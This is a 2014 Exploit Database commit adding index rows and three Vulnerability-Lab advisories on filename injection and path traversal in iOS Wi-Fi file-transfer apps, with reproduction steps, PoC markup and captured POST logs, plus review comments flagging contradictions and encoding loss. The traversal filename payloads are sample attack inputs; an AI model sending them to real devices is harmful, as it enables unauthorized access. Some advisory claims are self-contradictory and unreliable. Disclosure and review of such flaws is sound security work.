Updated 06_05_2014

This commit is contained in:
Offensive Security 2014-06-05 04:36:35 +00:00
parent e6f333a7b5
commit e97b490546
19 changed files with 2069 additions and 4 deletions

@ -18087,7 +18087,7 @@ id,file,description,date,author,platform,type,port
20812,platforms/windows/remote/20812.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3)",1997-11-20,m3lt,windows,remote,0
20813,platforms/multiple/remote/20813.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4)",1997-11-20,MondoMan,multiple,remote,0
20814,platforms/windows/remote/20814.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5)",1997-11-20,"Dejan Levaja",windows,remote,0
20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (1)",2001-05-01,storm,windows,remote,0
20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - .printer ISAPI Extension Buffer Overflow Vulnerability (1)",2001-05-01,storm,windows,remote,0
20816,platforms/windows/remote/20816.c,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (2)",2001-05-01,"dark spyrit",windows,remote,0
20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (3)",2005-02-02,styx,windows,remote,0
20818,platforms/windows/remote/20818.txt,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (4)",2001-05-01,"Cyrus The Great",windows,remote,0
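Review bot: the only change in this hunk is the 20815 description gaining a " - " separator ("Microsoft IIS 5.0 - .printer ISAPI Extension Buffer Overflow Vulnerability (1)"), while the sibling rows 20816, 20817 and 20818 for the same issue keep the old form "Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (2)" and so on; if the separator is the intended house format, apply it to all four rows in the same commit so the series stays consistent and searches on the product string keep matching.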
@ -30295,3 +30295,20 @@ id,file,description,date,author,platform,type,port
33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance Multiple Command Restriction Weakness Local Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
33624,platforms/php/webapps/33624.txt,"vBulletin <= 3.5.4 Multiple Cross Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0
33625,platforms/php/dos/33625.php,"PHP <= 5.3.1 'session_save_path()' 'safe_mode' Restriction-Bypass Vulnerability",2010-02-11,"Grzegorz Stachowiak",php,dos,0
33626,platforms/php/webapps/33626.txt,"PHPBTTracker+ 2.2 - SQL Injection",2014-06-03,"BackBox Linux Team",php,webapps,80
33627,platforms/ios/webapps/33627.txt,"NG WifiTransfer Pro 1.1 - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080
33628,platforms/ios/webapps/33628.txt,"Files Desk Pro v1.4 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8081
33629,platforms/ios/webapps/33629.txt,"Privacy Pro v1.2 HZ iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,56380
33630,platforms/ios/webapps/33630.txt,"TigerCom My Assistant 1.1 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080
33631,platforms/ios/webapps/33631.txt,"AllReader 1.0 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080
33632,platforms/ios/webapps/33632.txt,"Bluetooth Photo-File Share 2.1 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080
33634,platforms/php/webapps/33634.txt,"CommodityRentals CD Rental Software 'index.php' SQL Injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0
33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service Vulnerability",2008-07-31,"Rémi Denis-Courmont",linux,dos,0
33636,platforms/php/webapps/33636.sh,"Interspire Knowledge Manager 5 'callback.snipshot.php' Arbitrary File Creation Vulnerability",2010-02-03,"Cory Marsh",php,webapps,0
33637,platforms/php/webapps/33637.txt,"Webee Comments Component 1.1/1.2 for Joomla! index2.php articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps,0
33638,platforms/php/webapps/33638.txt,"Webee Comments Component 1.1/1.2 for Joomla! Multiple BBCode Tags XSS",2009-11-15,"Jeff Channell",php,webapps,0
33639,platforms/php/webapps/33639.txt,"Joomla! EasyBook 2.0.0rc4 Component Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0
33640,platforms/windows/dos/33640.py,"AIMP <= 2.8.3 '.m3u' File Remote Stack Buffer Overflow Vulnerability",2010-02-12,Molotov,windows,dos,0
33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC SQL Injection and HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0
33642,platforms/windows/remote/33642.html,"Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0
33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 Local File Include and Cross Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0
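Review bot: the new rows skip an id (33632 is followed by 33634) and the date column is inconsistent with the files this commit adds: 33626 through 33632 are dated 2014-06-03, yet the advisory files themselves carry Release Dates of 2014-04-28 (33627), 2014-05-16 (33628) and 2014-05-23 (33629), while the re-added rows 33634 through 33643 keep their original 2008 to 2010 publication dates. Either the 2014 rows should carry the advisory release dates as well, or the column's meaning (original publication versus date added here) needs stating, and the missing 33633 should be explained as a deliberate gap or filled. Minor: 33627 is listed as "NG WifiTransfer Pro 1.1 - Local File Inclusion" although the added file titles itself "NG WifiTransfer Pro 1.1 - File Include Vulnerability"; keep the two in step.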

platforms/ios/webapps/33627.txt Executable file
@ -0,0 +1,208 @@
Document Title:
===============
NG WifiTransfer Pro 1.1 - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1260
Release Date:
=============
2014-04-28
Vulnerability Laboratory ID (VL-ID):
====================================
1260
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
The easiest way to transfer files between iPhones or with computers! WifiTransfer enables fast wireless file transfer between
iPhones or with computers with a simple scan. WifiTransfer enables simple and ultra fast file transfer between iPhones over
Wi-Fi networks. Without any additional setup, just a QRCode scan will do. The target iPhone doesn`t have to install WifiTransfer.
An iPhone with an ARBITRARY scanner will do. (However, with WifiTransfer installed on the target iPhone, you will have better
control on the transfer process.) In addition to transfer files between iPhone/iPad, you can also remotely manage files on your
iPhone right from your desktop computer. Supported browsers: Safari, Chrome, FireFox, Internet Explorer.
(Copy of the Homepage: https://itunes.apple.com/us/app/wifitransfer-pro-instant-file/id802094784 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Notable Group WifiTransfer Pro v1.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-04-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Notable Group
Product: WifiTransfer Pro - iOS Mobile Application 1.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Notable Group WifiTransfer Pro v1.1 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs
in the `WifiTransfer File Management` listing context. The attacker is able to inject the local file include request by usage of the
`wifi interface` or by a local privileged application user account via `file sync`(app).
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different
local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security
risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST] - Remote
[+] [SYNC] - Local
Vulnerable Module(s):
[+] WifiTransfer File Management (UI)
Vulnerable Function(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by attackers without privileged application user account and low user interaction.
For security demonstration or to reproduce the file include web vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the vulnerable wifi ios software app (https://itunes.apple.com/us/app/wifitransfer-pro-instant-file/id802094784)
2. Start the server and activate the localhost wifi server
3. Open the wifi interface in a browser or console > http://localhost:8080/
4. The the directory button to choose a file for a upload
5. Activate a session tamper to capture the request information to intercept
6. Click the upload button and inject your own path/file request inside of the filename value
7. Open the interface in the browser and the execution occurs in the file dir item listing context
8. Successful reproduce of the security vulnerability via wifi user interface!
Note: The inject is also possible via sync
1. Add a file in the device app interface
2. Inject the path request as payload in combination with script code and save
3. Activate the localhost wifi interface (web-server)
4. Open the interface in the browser and the execution occurs in the file dir item listing context
5. Successful reproduce of the security vulnerability via app sync!
PoC:
<table class="table table-hover" cellpadding="0" cellspacing="0" border="0">
<thead>
<tr><th>Name</th><th class="del">Action</th></tr>
</thead>
<tbody id="filelist">
<tr><td><a href="/files/%3C./-[LOCAL FILE INCLUDE VULNERABILITY!].png" class="file"><img src="img/image.png" style="vertical-align:middle;"><span><./-[LOCAL FILE INCLUDE VULNERABILITY!].png.png</span></a></td><td class='del'><div><a href='/files/%3C./-[LOCAL FILE INCLUDE VULNERABILITY!].png' class='btn btn-info btn-sm'>Download</a><form action='/files/%3C./-[LOCAL FILE INCLUDE VULNERABILITY!].png' method='post'><input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value=" Delete " class='btn btn-danger btn-sm' /></div></td></tr></tbody></table></iframe></span></a></td></tr></tbody>
</table>
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------2128355697111
Content-Disposition: form-data; name="newfile"; filename="./-[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
Reference(s):
http://localhost:8080/
http://localhost:8080/files
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable filename input value in the upload POST method request.
Filter and encode also the name value output in the wifi interface file dir listing.
Setup a restriction of the filename input and disallow data names with special chars.
Security Risk:
==============
The security risk of the local file include web vulnerability in the wifi interface is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
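Review bot: the advisory contradicts itself on preconditions, and the evidence does not support the "Local File Inclusion" label used for it in files.csv. "Technical Details" states exploitation "requires no user interaction but a privileged web-application user account with low user auth", the "Proof of Concept" section says it "can be exploited by attackers without privileged application user account and low user interaction", and "Exploitation Technique: Local" sits next to "[POST] - Remote"; one of each pair should be dropped. What the PoC actually shows is that the multipart filename "./-[LOCAL FILE INCLUDE VULNERABILITY!].png" is stored and echoed unencoded into the file listing (with a "%3C" in the rendered href that does not appear in the logged POST data), i.e. missing validation and output encoding of the stored name, which is precisely what the "Solution" section addresses; the description should say so rather than claim inclusion of local files. The file has also lost its non-ASCII characters ("Gr??e des Inhalts", "Copyright ? 2014"), so it was committed in a lossy encoding; re-save it as UTF-8 like the rest of the repository (compare "Rémi Denis-Courmont" in files.csv).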

platforms/ios/webapps/33628.txt Executable file
@ -0,0 +1,285 @@
Document Title:
===============
Files Desk Pro v1.4 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1266
Release Date:
=============
2014-05-16
Vulnerability Laboratory ID (VL-ID):
====================================
1266
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
FileDesk is iPhone/iPad app for managing your files. Read differect kind of files,Create PDFs with different contents, Make your
documents/files private,Share Your files over WiFi. File Desk - A digital desk for your files. Manage your Documents/Files With File Desk.
(Copy of the Homepage: https://itunes.apple.com/ag/app/file-desk-pro-documents-manager/id600550320 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official Files Desk Pro v1.4 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-05-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
LiveBird Technologies Private Limited
Product: Files Desk Pro & Lite 1.4
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Files Desk Pro v1.4 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files
with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path
include execution occcurs in the `index file dir` list of the `filesdesk` manager. The attacker is able to inject the local file
include request by usage of the `wifi interface` or by a local privileged application user accounts via `file sync`(app).
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to
execute different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the
request method to inject is POST. The security risk of the local file include web vulnerability is estimated as high with a
cvss (common vulnerability scoring system) count of 6.7.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user
account with low user auth. Successful exploitation of the local file include web vulnerability results in mobile application
or connected device component compromise.
Request Method(s):
[+] [POST] - Remote
[+] [SYNC] - Local
Vulnerable Module(s):
[+] FilesDesk Wifi (UI)
Vulnerable Function(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8081/)
Proof of Concept (PoC):
=======================
The local file/path include web vulnerability can be exploited local attackers without privileged application user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce ...
1. Install the FileDesk mobile application to your iOS device (ipad or iphone)
2. Start the local wifi web-server and share some random files
3. Connect with another remote computer to the local web-server interface url > web.localhost:8081
4. Start a session tamper and choose a random file to upload
5. Submit the upload form and intercept in the session to change the vulnerable filename value to a local device file/path
Note: Can also be combined with script codes and html tags
6. Refresh the index and the execution of the malicious request occurs in the index file dir list (name value)
7. Successful reproduce of the file include web vulnerability!
PoC: FilesDesk Index
<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr>
</thead>
<tbody id="filelist">
<tr><td><a href="/files/%3C[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png" class="file"><[LOCAL FILE/PATH INCLUDE
VULNERABILITY!]">.png</a></td><td class='del'><form action='/files/%3C[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png'
method='post'><input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value="Delete" class='button'
/></td></tr></tbody></table></iframe></a></td></tr></tbody>
</table>
Vulnerable Source: Upload Script
<script type="text/javascript" charset="utf-8">
var now = new Date();
$.getJSON("/files?"+ now.toString(),
function(data){
var shadow = false;
$.each(data, function(i,item){
var trclass='';
if (shadow)
trclass= " class='shadow'";
encodeName = encodeURI(item.name).replace("'", "'");
$("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td>" + "<td
class='del'><form action='/files/" + encodeName + "' method='post'><input name='_method' value='delete' type='hidden'/><input name=
\"commit\" type=\"submit\" value=\"Delete\" class='button' /></td>" + "</tr>").appendTo("#filelist");
shadow = !shadow;
});
});
</script>
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://192.168.2.104:8081/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[192.168.2.104:8081]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8081/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------147491436412682
Content-Disposition: form-data; name="newfile"; filename="%3C../[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png"
Content-Type: image/png
Status: 200[OK]
GET http://192.168.2.104:8081/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2953] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:8081]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8081/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[2953]
Date[Do., 15 Mai 2014 14:27:35 GMT]
Status: 200[OK]
GET http://192.168.2.104:8081/files?Thu%20May%2015%202014%2016:14:57%20GMT+0200 Load Flags[LOAD_BACKGROUND ] Gr??e des Inhalts[39] Mime Type[text/plain]
Request Header:
Host[192.168.2.104:8081]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[application/json, text/javascript, */*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://192.168.2.104:8081/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[39]
Cache-Control[private, max-age=0, must-revalidate]
Content-Type[text/plain; charset=utf-8]
Date[Do., 15 Mai 2014 14:27:37 GMT]
Status: 200[OK]
GET http://192.168.2.104:8081/%3C../[LOCAL FILE/PATH INCLUDE VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:8081]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8081/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Do., 15 Mai 2014 14:27:38 GMT]
Reference(s):
http://web.localhost:8081/[x]
http://web.localhost:8081/files
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the filename value in the upload POST method request.
Disallow special chars for files and foldernames and restrict the user input. Encode and parse also the vulnerable name output value.
Security Risk:
==============
The security risk of the local file include web vulnerability in the filename value is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
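Review bot: the "Vulnerable Source: Upload Script" block pins down the defect more precisely than the prose and the "Solution" section should name it: `encodeName = encodeURI(item.name)` is only used for the href, while the visible label is built as `"' class='file'>" + item.name + "</a>"`, so the raw stored filename is inserted as HTML into `#filelist`; and `.replace("'", "'")` as rendered here replaces an apostrophe with itself, so the single-quoted href is not protected either. The concrete fix is to HTML-encode `item.name` (or set it through a text API instead of string-built markup) and to escape the quote in the href separately, which is more actionable than "Encode and parse also the vulnerable name output value". Two smaller points: step 3 sends the reader to "web.localhost:8081" while every logged request goes to 192.168.2.104:8081, and the log's non-ASCII characters are lost ("Gr??e des Inhalts", "Copyright ?"), so the file should be re-saved as UTF-8.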

platforms/ios/webapps/33629.txt Executable file
@ -0,0 +1,197 @@
Document Title:
===============
Privacy Pro v1.2 HZ iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1267
Release Date:
=============
2014-05-23
Vulnerability Laboratory ID (VL-ID):
====================================
1267
Common Vulnerability Scoring System:
====================================
6.6
Product & Service Introduction:
===============================
First of all,you need to enter the password two times that means to enter the password and confirm password,please remember the password, so as
to avoid unnecessary trouble. Personal information manager can provide personal information service personal for you, and provide the password
verification to ensure the privacy and security of your, include private account, video, pictures, books, telephone, recording, encryption and
decryption , memos and other functions, and the personal information manager can support WiFi data backup and recovery, we hope it can give
quite a lot convenient to your life.
( Copy of the Homepage: https://itunes.apple.com/de/app/privacy-account-video-picture/id790084948 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official Privacy Pro v1.2 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-05-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Huang Zhuan
Product: Privacy [Account Video Picture Books Record] - iOS Mobile Web Application 1.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Privacy Pro v1.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with
malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include
execution occcurs not like regular in the index list but inside of the upload formular message filename context. The attacker is able
to inject the local file include request by usage of the `wifi interface`. The affected service inside of the application is only the
privacy manager `wifi revover data` module. (localhost:56380 -restore)
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to
inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system)
count of 6.6. Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application
user account with low user auth. Successful exploitation of the local file include web vulnerability results in mobile application or
connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] WiFi Restore Data
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:56380/)
Proof of Concept (PoC):
=======================
The local file/path include web vulnerability can be exploited by local network attackers with low user interaction. For security demonstration or
to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Source
<html><head></head><body>../.[FILE/PATH INCLUDE VULNERABILITY!] Upload successfully!</body></html>
--- PoC Session Logs [POST] ---
POST http://localhost:56380/upload Load Flags[LOAD_ONLY_FROM_CACHE LOAD_FROM_CACHE VALIDATE_NEVER LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[-1] Mime Type[unbekannt]
Request Header:
Host[localhost:56380]
User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:56380/index.html]
POST-Daten:
POST_DATA[-----------------------------57581386217946
Content-Disposition: form-data; name="upload_file"; filename="../.[LOCAL FILE/PATH INCLUDE VULNERABILITY!].jpg"
Content-Type: image/jpg
Response Header:
Status: 200[OK]
GET http://192.168.2.104:56380/index.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[1084] Mime Type[text/html]
Request Header:
Host[192.168.2.104:56380]
User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Content-Length[1084]
Content-Type[text/html]
Reference(s):
http://localhost:56380/index.html (Wifi Restore Data)
http://localhost:56380/upload (Vulnerable File)
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the upload notification message context and input value.
Restrict the upload input and validate the context next to the data restore.
Security Risk:
==============
The security risk of the local file/path include web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
